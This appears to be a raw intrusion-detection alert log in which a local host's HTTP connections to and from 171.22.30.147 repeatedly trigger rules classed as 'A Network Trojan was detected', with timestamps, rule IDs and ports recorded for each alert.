            Timestamp:171.22.30.147192.168.2.380498342025483 01/05/23-08:52:50.604457
            SID:2025483
            Source Port:80
            Destination Port:49834
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750070802825766 01/05/23-08:54:00.166694
            SID:2825766
            Source Port:50070
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499832025483 01/05/23-08:53:35.550441
            SID:2025483
            Source Port:80
            Destination Port:49983
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750047802825766 01/05/23-08:53:54.007519
            SID:2825766
            Source Port:50047
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750048802021641 01/05/23-08:53:54.265201
            SID:2021641
            Source Port:50048
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498502025483 01/05/23-08:52:56.257670
            SID:2025483
            Source Port:80
            Destination Port:49850
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749719802825766 01/05/23-08:52:15.841614
            SID:2825766
            Source Port:49719
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750054802024313 01/05/23-08:53:55.890469
            SID:2024313
            Source Port:50054
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499462025483 01/05/23-08:53:23.634143
            SID:2025483
            Source Port:80
            Destination Port:49946
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749871802025381 01/05/23-08:53:01.829225
            SID:2025381
            Source Port:49871
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500222025483 01/05/23-08:53:46.752847
            SID:2025483
            Source Port:80
            Destination Port:50022
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500262025483 01/05/23-08:53:48.419968
            SID:2025483
            Source Port:80
            Destination Port:50026
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749849802024318 01/05/23-08:52:55.895226
            SID:2024318
            Source Port:49849
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749947802024318 01/05/23-08:53:23.814636
            SID:2024318
            Source Port:49947
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749818802021641 01/05/23-08:52:46.013246
            SID:2021641
            Source Port:49818
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749944802021641 01/05/23-08:53:23.021157
            SID:2021641
            Source Port:49944
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499092025483 01/05/23-08:53:13.570729
            SID:2025483
            Source Port:80
            Destination Port:49909
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749754802024313 01/05/23-08:52:26.655822
            SID:2024313
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749852802024313 01/05/23-08:52:56.705137
            SID:2024313
            Source Port:49852
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749754802024318 01/05/23-08:52:26.655822
            SID:2024318
            Source Port:49754
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749852802024318 01/05/23-08:52:56.705137
            SID:2024318
            Source Port:49852
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749966802025381 01/05/23-08:53:30.946864
            SID:2025381
            Source Port:49966
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749868802025381 01/05/23-08:53:01.029018
            SID:2025381
            Source Port:49868
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749745802025381 01/05/23-08:52:24.023320
            SID:2025381
            Source Port:49745
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498882025483 01/05/23-08:53:06.467800
            SID:2025483
            Source Port:80
            Destination Port:49888
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749955802024313 01/05/23-08:53:25.989714
            SID:2024313
            Source Port:49955
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750073802025381 01/05/23-08:54:00.951462
            SID:2025381
            Source Port:50073
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749951802825766 01/05/23-08:53:24.927407
            SID:2825766
            Source Port:49951
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499052025483 01/05/23-08:53:12.488803
            SID:2025483
            Source Port:80
            Destination Port:49905
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749750802825766 01/05/23-08:52:25.450968
            SID:2825766
            Source Port:49750
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750004802025381 01/05/23-08:53:41.033557
            SID:2025381
            Source Port:50004
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749727802825766 01/05/23-08:52:18.985108
            SID:2825766
            Source Port:49727
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749849802024313 01/05/23-08:52:55.895226
            SID:2024313
            Source Port:49849
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749845802825766 01/05/23-08:52:54.838950
            SID:2825766
            Source Port:49845
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749826802021641 01/05/23-08:52:48.184567
            SID:2021641
            Source Port:49826
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750054802024318 01/05/23-08:53:55.890469
            SID:2024318
            Source Port:50054
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749743802021641 01/05/23-08:52:23.467755
            SID:2021641
            Source Port:49743
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750071802021641 01/05/23-08:54:00.426977
            SID:2021641
            Source Port:50071
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749838802021641 01/05/23-08:52:52.824149
            SID:2021641
            Source Port:49838
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749891802025381 01/05/23-08:53:07.205477
            SID:2025381
            Source Port:49891
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749734802024313 01/05/23-08:52:20.978367
            SID:2024313
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750062802024313 01/05/23-08:53:58.073723
            SID:2024313
            Source Port:50062
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497892025483 01/05/23-08:52:38.164363
            SID:2025483
            Source Port:80
            Destination Port:49789
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749789802021641 01/05/23-08:52:38.076275
            SID:2021641
            Source Port:49789
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749734802024318 01/05/23-08:52:20.978367
            SID:2024318
            Source Port:49734
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750062802024318 01/05/23-08:53:58.073723
            SID:2024318
            Source Port:50062
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749887802021641 01/05/23-08:53:06.117016
            SID:2021641
            Source Port:49887
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749703802021641 01/05/23-08:52:08.565296
            SID:2021641
            Source Port:49703
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749946802025381 01/05/23-08:53:23.547730
            SID:2025381
            Source Port:49946
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749753802025381 01/05/23-08:52:26.326305
            SID:2025381
            Source Port:49753
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749872802024318 01/05/23-08:53:02.084337
            SID:2024318
            Source Port:49872
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749869802024318 01/05/23-08:53:01.298022
            SID:2024318
            Source Port:49869
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749971802825766 01/05/23-08:53:32.299331
            SID:2825766
            Source Port:49971
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498842025483 01/05/23-08:53:05.373418
            SID:2025483
            Source Port:80
            Destination Port:49884
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749955802024318 01/05/23-08:53:25.989714
            SID:2024318
            Source Port:49955
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749872802024313 01/05/23-08:53:02.084337
            SID:2024313
            Source Port:49872
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750027802825766 01/05/23-08:53:48.599181
            SID:2825766
            Source Port:50027
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749865802825766 01/05/23-08:53:00.234414
            SID:2825766
            Source Port:49865
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749902802825766 01/05/23-08:53:11.610501
            SID:2825766
            Source Port:49902
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749869802024313 01/05/23-08:53:01.298022
            SID:2024313
            Source Port:49869
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749989802825766 01/05/23-08:53:37.099082
            SID:2825766
            Source Port:49989
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498692025483 01/05/23-08:53:01.381580
            SID:2025483
            Source Port:80
            Destination Port:49869
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749947802024313 01/05/23-08:53:23.814636
            SID:2024313
            Source Port:49947
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498472025483 01/05/23-08:52:55.454099
            SID:2025483
            Source Port:80
            Destination Port:49847
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749730802825766 01/05/23-08:52:19.853027
            SID:2825766
            Source Port:49730
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750053802025381 01/05/23-08:53:55.636070
            SID:2025381
            Source Port:50053
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749924802021641 01/05/23-08:53:17.587003
            SID:2021641
            Source Port:49924
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749904802021641 01/05/23-08:53:12.139251
            SID:2021641
            Source Port:49904
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500072025483 01/05/23-08:53:41.908536
            SID:2025483
            Source Port:80
            Destination Port:50007
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750042802024313 01/05/23-08:53:52.687057
            SID:2024313
            Source Port:50042
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749711802021641 01/05/23-08:52:12.061796
            SID:2021641
            Source Port:49711
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750042802024318 01/05/23-08:53:52.687057
            SID:2024318
            Source Port:50042
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749800802021641 01/05/23-08:52:41.099242
            SID:2021641
            Source Port:49800
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749806802021641 01/05/23-08:52:42.779655
            SID:2021641
            Source Port:49806
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749809802024318 01/05/23-08:52:43.596832
            SID:2024318
            Source Port:49809
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500042025483 01/05/23-08:53:41.114864
            SID:2025483
            Source Port:80
            Destination Port:50004
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749766802024313 01/05/23-08:52:30.012463
            SID:2024313
            Source Port:49766
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749809802024313 01/05/23-08:52:43.596832
            SID:2024313
            Source Port:49809
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749707802825766 01/05/23-08:52:10.342729
            SID:2825766
            Source Port:49707
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749766802024318 01/05/23-08:52:30.012463
            SID:2024318
            Source Port:49766
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749840802024318 01/05/23-08:52:53.465268
            SID:2024318
            Source Port:49840
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750002802021641 01/05/23-08:53:40.505314
            SID:2021641
            Source Port:50002
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750005802024313 01/05/23-08:53:41.297546
            SID:2024313
            Source Port:50005
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749822802025381 01/05/23-08:52:47.112264
            SID:2025381
            Source Port:49822
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750005802024318 01/05/23-08:53:41.297546
            SID:2024318
            Source Port:50005
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749935802024318 01/05/23-08:53:20.565175
            SID:2024318
            Source Port:49935
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750011802021641 01/05/23-08:53:42.925761
            SID:2021641
            Source Port:50011
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749993802021641 01/05/23-08:53:38.145026
            SID:2021641
            Source Port:49993
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749840802024313 01/05/23-08:52:53.465268
            SID:2024313
            Source Port:49840
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750044802025381 01/05/23-08:53:53.227481
            SID:2025381
            Source Port:50044
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749796802825766 01/05/23-08:52:39.986568
            SID:2825766
            Source Port:49796
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749733802025381 01/05/23-08:52:20.679095
            SID:2025381
            Source Port:49733
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749967802024313 01/05/23-08:53:31.230819
            SID:2024313
            Source Port:49967
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498662025483 01/05/23-08:53:00.596675
            SID:2025483
            Source Port:80
            Destination Port:49866
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749878802024313 01/05/23-08:53:03.704233
            SID:2024313
            Source Port:49878
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750031802021641 01/05/23-08:53:49.661487
            SID:2021641
            Source Port:50031
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500482025483 01/05/23-08:53:54.346619
            SID:2025483
            Source Port:80
            Destination Port:50048
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749911802825766 01/05/23-08:53:14.014731
            SID:2825766
            Source Port:49911
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499992025483 01/05/23-08:53:39.815924
            SID:2025483
            Source Port:80
            Destination Port:49999
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749710802825766 01/05/23-08:52:11.662757
            SID:2825766
            Source Port:49710
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750074802024313 01/05/23-08:54:01.233569
            SID:2024313
            Source Port:50074
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750015802825766 01/05/23-08:53:43.993137
            SID:2825766
            Source Port:50015
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750074802024318 01/05/23-08:54:01.233569
            SID:2024318
            Source Port:50074
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749739802825766 01/05/23-08:52:22.339123
            SID:2825766
            Source Port:49739
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750021802825766 01/05/23-08:53:46.361205
            SID:2825766
            Source Port:50021
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749783802021641 01/05/23-08:52:36.372208
            SID:2021641
            Source Port:49783
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749940802025381 01/05/23-08:53:21.893765
            SID:2025381
            Source Port:49940
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749848802025381 01/05/23-08:52:55.640788
            SID:2025381
            Source Port:49848
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749878802024318 01/05/23-08:53:03.704233
            SID:2024318
            Source Port:49878
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749967802024318 01/05/23-08:53:31.230819
            SID:2024318
            Source Port:49967
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749875802021641 01/05/23-08:53:02.907470
            SID:2021641
            Source Port:49875
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750028802021641 01/05/23-08:53:48.853917
            SID:2021641
            Source Port:50028
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749765802025381 01/05/23-08:52:29.748218
            SID:2025381
            Source Port:49765
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749792802021641 01/05/23-08:52:38.887901
            SID:2021641
            Source Port:49792
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749937802025381 01/05/23-08:53:21.090422
            SID:2025381
            Source Port:49937
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749977802825766 01/05/23-08:53:33.899852
            SID:2825766
            Source Port:49977
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749964802021641 01/05/23-08:53:30.400374
            SID:2021641
            Source Port:49964
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497482025483 01/05/23-08:52:24.963164
            SID:2025483
            Source Port:80
            Destination Port:49748
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749881802021641 01/05/23-08:53:04.500331
            SID:2021641
            Source Port:49881
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749770802825766 01/05/23-08:52:31.112136
            SID:2825766
            Source Port:49770
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749851802025381 01/05/23-08:52:56.435777
            SID:2025381
            Source Port:49851
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749983802825766 01/05/23-08:53:35.478290
            SID:2825766
            Source Port:49983
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749885802825766 01/05/23-08:53:05.575803
            SID:2825766
            Source Port:49885
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497512025483 01/05/23-08:52:25.845383
            SID:2025483
            Source Port:80
            Destination Port:49751
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749934802025381 01/05/23-08:53:20.304475
            SID:2025381
            Source Port:49934
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749894802825766 01/05/23-08:53:08.006895
            SID:2825766
            Source Port:49894
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749980802825766 01/05/23-08:53:34.702395
            SID:2825766
            Source Port:49980
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497322025483 01/05/23-08:52:20.491522
            SID:2025483
            Source Port:80
            Destination Port:49732
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749935802024313 01/05/23-08:53:20.565175
            SID:2024313
            Source Port:49935
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497732025483 01/05/23-08:52:31.998630
            SID:2025483
            Source Port:80
            Destination Port:49773
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750041802025381 01/05/23-08:53:52.410718
            SID:2025381
            Source Port:50041
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749825802825766 01/05/23-08:52:47.903129
            SID:2825766
            Source Port:49825
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380499612025483 01/05/23-08:53:29.675200
            SID:2025483
            Source Port:80
            Destination Port:49961
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497102025483 01/05/23-08:52:11.755900
            SID:2025483
            Source Port:80
            Destination Port:49710
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497952025483 01/05/23-08:52:39.801322
            SID:2025483
            Source Port:80
            Destination Port:49795
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749723802021641 01/05/23-08:52:17.811814
            SID:2021641
            Source Port:49723
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749908802825766 01/05/23-08:53:13.214132
            SID:2825766
            Source Port:49908
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749701802825766 01/05/23-08:52:07.731855
            SID:2825766
            Source Port:49701
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749812802021641 01/05/23-08:52:44.412618
            SID:2021641
            Source Port:49812
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749914802825766 01/05/23-08:53:14.852027
            SID:2825766
            Source Port:49914
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749717802024313 01/05/23-08:52:14.673219
            SID:2024313
            Source Port:49717
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749800802024318 01/05/23-08:52:41.099242
            SID:2024318
            Source Port:49800
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750045802024313 01/05/23-08:53:53.481872
            SID:2024313
            Source Port:50045
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749809802021641 01/05/23-08:52:43.596832
            SID:2021641
            Source Port:49809
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380498162025483 01/05/23-08:52:45.565007
            SID:2025483
            Source Port:80
            Destination Port:49816
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750041802825766 01/05/23-08:53:52.410718
            SID:2825766
            Source Port:50041
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749800802024313 01/05/23-08:52:41.099242
            SID:2024313
            Source Port:49800
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749760802021641 01/05/23-08:52:28.304789
            SID:2021641
            Source Port:49760
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749855802021641 01/05/23-08:52:57.514506
            SID:2021641
            Source Port:49855
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380500292025483 01/05/23-08:53:49.195503
            SID:2025483
            Source Port:80
            Destination Port:50029
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750057802021641 01/05/23-08:53:56.743180
            SID:2021641
            Source Port:50057
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749960802025381 01/05/23-08:53:28.475539
            SID:2025381
            Source Port:49960
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749782802025381 01/05/23-08:52:36.098088
            SID:2025381
            Source Port:49782
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749914802025381 01/05/23-08:53:14.852027
            SID:2025381
            Source Port:49914
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14750002802024313 01/05/23-08:53:40.505314
            SID:2024313
            Source Port:50002
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749699802025381 01/05/23-08:52:06.870270
            SID:2025381
            Source Port:49699
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:192.168.2.3171.22.30.14749996802021641 01/05/23-08:53:38.933239
            SID:2021641
            Source Port:49996
            Destination Port:80
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:171.22.30.147192.168.2.380497542025483 01/05/23-08:52:26.735221
            SID:2025483
            Source Port:80
            Destination Port:49754
            Protocol:TCP
            Classtype:A Network Trojan was detected
